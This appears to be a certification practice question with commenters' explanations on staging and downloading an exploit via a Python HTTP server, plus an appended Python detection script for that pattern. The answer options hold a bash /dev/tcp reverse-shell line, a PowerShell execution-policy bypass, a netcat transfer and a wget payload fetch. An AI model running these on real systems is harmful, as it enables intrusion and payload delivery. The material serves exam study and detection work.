A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?
A. nc 10.10.51.50 9891 < exploit
B. powershell -exec bypass -f \\10.10.51.50\9891
C. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit
D. wget 10.10.51.50:9891/exploit
The command "python -m SimpleHTTPServer 9891" starts a simple HTTP server on the machine it's executed on, on port 9891. This means that the file "exploit" would be served on the IP address of the machine on port 9891.
To download the file "exploit" from the HTTP server that was started, the command "wget 10.10.51.50:9891/exploit" can be used. This command uses the wget utility to download files from the web via HTTP, HTTPS and FTP. In this case, it's connecting to the IP address 10.10.51.50 and port 9891, where the exploit file is hosted, and downloads the file.
Option A doesn't work because the command "nc" (netcat) is a tool that can be used to read and write data across a network; it's not used to download files. Options B and C are not valid commands that can be used to download files from a web server.
The command "python -m SimpleHTTPServer 9891" starts a web server on the staging server, listening on port 9891. This allows clients to download files from the server using HTTP.
I think this question is malformed, but ok.
The meaning of the question is:
I start a webserver on VM1 and I want to grab a file like "exploited_password.txt" from the webserver (VM1) to my machine.
That's why the perfect answer is D wget (or curl).
B. "\\10.10.51.50" is not a valid path to download files from an HTTP server; here it is a Windows shared directory path.
C. Good to create an inverse shell, but not valid to download files from an HTTP server.
A. tricky answer... Not good for a lot of reasons:
+ this command is sending "exploited_password.txt" TO the webserver, and not getting it FROM the webserver
+ netcat is not properly used to send a file to a webserver; you could, but in a different way, like:
on my machine: I execute netcat to wait for a file
on VM1: I execute netcat to send a file.
But that means I don't need to open a webserver.
The command "bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit" redirects a Bash shell to the network address 10.10.51.50 on port 9891. This allows you to send and receive data over the network and can be used to exploit vulnerable services.
The command "python -m SimpleHTTPServer 9891" starts a web server using the Python SimpleHTTPServer module. It binds the web server to port 9891, making it accessible through localhost on your computer. The server can be accessed from other computers by using the IP address of your computer along with the port number.
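The server-then-download pattern discussed above, seen from the detection side. This is an added example, not part of the original question or any comment. It goes beyond the question by also matching Python 3's http.server module and curl. The event format, the client addresses, and the function names are assumptions constructed for illustration.

```python
import re
import shlex

# Constructed process-execution records (host IP, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("10.10.51.50", "python -m SimpleHTTPServer 9891"),
    ("10.10.51.77", "wget 10.10.51.50:9891/exploit"),
    ("10.10.51.78", "curl -O http://10.10.51.50:9891/exploit"),
    ("10.10.51.79", "wget https://example.org/index.html"),
    ("10.10.51.80", "python3 -m http.server"),
]

SERVER_MODULES = {"SimpleHTTPServer", "http.server"}
# Bare IP:port targets, with or without a scheme (wget accepts both forms).
URL_RE = re.compile(r"^(?:https?://)?(\d{1,3}(?:\.\d{1,3}){3}):(\d+)(/\S*)?$")

def find_servers(events):
    """Return {(host, port)} for every ad hoc Python HTTP server started."""
    servers = set()
    for host, cmd in events:
        argv = shlex.split(cmd)
        if len(argv) < 3 or argv[1] != "-m" or argv[2] not in SERVER_MODULES:
            continue
        if argv[0].rsplit("/", 1)[-1].startswith("python"):
            # Both modules listen on port 8000 when no port argument is given.
            port = next((int(a) for a in argv[3:] if a.isdigit()), 8000)
            servers.add((host, port))
    return servers

def find_fetches(events, servers):
    """Return (client, server, port, path) for wget/curl pulls from those servers."""
    hits = []
    for host, cmd in events:
        argv = shlex.split(cmd)
        if not argv or argv[0] not in ("wget", "curl"):
            continue
        for arg in argv[1:]:
            m = URL_RE.match(arg)
            if m and (m.group(1), int(m.group(2))) in servers:
                hits.append((host, m.group(1), int(m.group(2)), m.group(3) or "/"))
    return hits

if __name__ == "__main__":
    staged = find_servers(SAMPLE_EVENTS)
    for hit in find_fetches(SAMPLE_EVENTS, staged):
        print("staged download: %s fetched %s:%d%s" % hit)
```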